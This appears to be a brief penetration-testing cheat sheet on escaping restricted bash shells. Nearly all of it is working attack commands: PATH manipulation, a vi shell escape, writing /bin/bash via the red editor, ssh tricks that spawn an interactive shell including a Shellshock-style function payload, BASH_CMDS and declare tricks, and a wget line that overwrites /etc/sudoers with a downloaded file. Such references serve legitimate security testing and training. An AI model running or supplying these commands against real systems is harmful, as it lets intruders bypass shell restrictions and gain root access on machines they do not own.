Bash Jails

First enumerate the best you can:

echo $SHELL
echo $PATH
env
export
pwd

Check if you can modify the PATH env variable

echo $PATH 
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin 
echo /home/*

:set shell=/bin/sh
:shell

Check if you can create an executable file with /bin/bash as content

red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path

If you are accessing via ssh you can use this trick to execute a bash shell:

ssh -t user@<IP> bash # Get directly an interactive shell
ssh user@<IP> -t "bash --noprofile -i"
ssh user@<IP> -t "() { :; }; sh -i "

declare -n PATH; export PATH=/bin;bash -i
 
BASH_CMDS[shell]=/bin/bash;shell -i

You can overwrite for example sudoers file

wget http://127.0.0.1:8080/sudoers -O /etc/sudoers

Last updated 2 years ago

hashtagBash Jails